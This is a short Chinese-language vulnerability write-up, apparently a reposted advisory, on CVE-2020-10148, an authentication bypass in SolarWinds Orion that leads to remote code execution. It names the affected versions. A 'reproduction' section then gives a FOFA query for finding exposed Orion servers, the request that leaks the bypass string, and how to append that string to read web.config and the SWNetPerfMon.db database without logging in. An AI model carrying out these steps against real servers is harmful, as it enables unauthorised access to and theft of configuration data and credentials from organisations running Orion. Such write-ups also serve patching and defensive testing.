漏洞简述
SolarWinds 发布了 SolarWinds 代码执行漏洞 的风险通告,该漏洞编号为 CVE-2020-10148,漏洞等级:高危。
SolarWinds公开了供应链攻击之外的一处漏洞。该漏洞允许未授权的攻击者在受影响的SolarWinds系统上执行任意代码。
漏洞详情
SolarWinds Orion 平台中存在一处权限绕过漏洞。攻击者通过访问,绕过权限验证。最终通过访问功能性API,导致远程代码执行。
影响版本
solarwinds:orion:<2020.2.1HF2
solarwinds:orion:<2019.4HF6
漏洞复现
fofo搜索语法
title="SolarWinds Orion"
访问/Orion/invalid.aspx.js
路径,获取请求头中Location数据
.i18n.ashx?l=en-us&v=43714.46.L
将.i18n.ashx?l=en-us&v=43714.46.L
携带到需要获取文件内容的路径,从而绕过身份认证。这里访问的是web.config和SWNetPerfMon.db。